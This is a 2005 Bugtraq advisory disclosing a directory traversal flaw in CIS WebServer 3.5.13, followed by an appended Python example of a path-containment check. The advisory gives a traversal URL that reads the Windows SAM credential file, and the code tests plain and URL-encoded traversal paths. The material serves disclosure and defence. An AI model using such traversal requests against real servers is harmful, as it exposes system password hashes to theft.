CIS WebServer Directory Traversal Bug

From: CorryL (corryl_at_sitoverde.com)
Date: 02/25/05

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Fri, 25 Feb 2005 18:31:34 +0100
    
    

    -=[ x0n3-h4ck Italian Security Team ]=-

    /*Advisories*\

    /*

    Application: CIS WebServer

    Vendor's Url: www.cisindia.net

    Version: 3.5.13

    Platforms: Windows

    Bug: Directory Traversal

    Exploitation: Remote

    Author: CorryL

    corryl80@gmail.com

    www.x0n3-h4ck.org

    *\

    {Description}

    CIS WebServer is an easy HTTP server. A remote user can obtain files on the
    system that are located outside of
    the web document directory.

    {Bug}

    http://victimhost/../../../windows/repair/sam

    A remote user succeeds in reading the SAM file of the system where CIS WebServer
    is running.

    {Vendor Status}

    20/02/2005 Vendor notification

    21/02/2005 Vendor Response

    25/02/2005 No patch release from vendor

    25/02/2005 Public disclosure

    {Fix}

    Waiting for an official patch

    _________________________________
    www.seekstat.it is your web stat
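
The containment check whose absence produces the behaviour reported above, as an added example that is not part of the original advisory and is not CIS WebServer code. `DOCROOT`, `naive_resolve` and `safe_resolve` are hypothetical names, the join-without-check pattern is an assumed model of the flaw, and `ntpath` is used so the Windows path rules apply on any platform (the check is lexical and does not follow junctions or symlinks).

```python
import ntpath
from urllib.parse import unquote, urlsplit

DOCROOT = r"C:\cis\htdocs"  # hypothetical document root (assumption)


def naive_resolve(docroot, url_path):
    """Assumed flawed pattern: join the request path to the docroot, no check."""
    rel = unquote(urlsplit(url_path).path).replace("/", "\\").lstrip("\\")
    return ntpath.normpath(ntpath.join(docroot, rel))


def safe_resolve(docroot, url_path):
    """Return the normalized file path if it stays inside docroot, else None."""
    decoded = unquote(urlsplit(url_path).path)  # decode %2e%2e before checking
    if "\x00" in decoded:
        return None
    rel = decoded.replace("/", "\\").lstrip("\\")
    # A drive-qualified component ("c:\...") would replace the docroot in join().
    if ntpath.splitdrive(rel)[0]:
        return None
    root = ntpath.normcase(ntpath.normpath(docroot))
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, rel)))
    # Compare on a separator boundary so "htdocs_backup" does not pass as "htdocs".
    if candidate != root and not candidate.startswith(root + "\\"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths; the first is the path from the advisory's URL.
    for path in ("/../../../windows/repair/sam",
                 "/%2e%2e/%2e%2e/%2e%2e/windows/repair/sam",
                 "/index.html"):
        print(path, "->", safe_resolve(DOCROOT, path) or "rejected (403)")
```
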

